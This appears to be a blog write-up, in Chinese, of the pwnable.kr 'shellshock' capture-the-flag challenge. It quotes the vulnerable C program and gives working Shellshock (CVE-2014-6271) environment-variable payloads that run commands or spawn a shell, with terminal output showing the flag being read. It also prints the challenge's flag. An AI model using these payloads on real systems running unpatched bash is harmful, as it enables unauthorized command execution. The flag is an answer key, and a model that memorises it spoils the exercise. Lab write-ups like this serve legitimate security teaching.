pwnable.kr-shellshock

题目描述:

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure 🙂
ssh [email protected] -p2222 (pw:guest)

shellshock.c的源码为:

#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

顾名思义了,这题就是需要利用shellshock漏洞来获取flag,具体的讲解参见:http://www.myhack58.com/Article/html/3/62/2015/60779.htm

所以我们构造payload:export foo='() { :; }; cat flag‘直接获取flag,或者export foo='() { :; }; bash’切换成shellshock2用户的bash,然后再执行命令获取flag:

[email protected]:/home/shellshock$ export foo='() { :; }; bash’
[email protected]:/home/shellshock$ ./shellshock
[email protected]:/home/shellshock$
[email protected]:/home/shellshock$
[email protected]:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
[email protected]:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
[email protected]:/home/shellshock$ whoami
shellshock
[email protected]:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
[email protected]:/home/shellshock$ id
uid=1048(shellshock) gid=1049(shellshock2) groups=1048(shellshock)

最后的flag为:only if I knew CVE-2014-6271 ten years ago..!!

About the Author

admin

Leave a Reply

Your email address will not be published. Required fields are marked *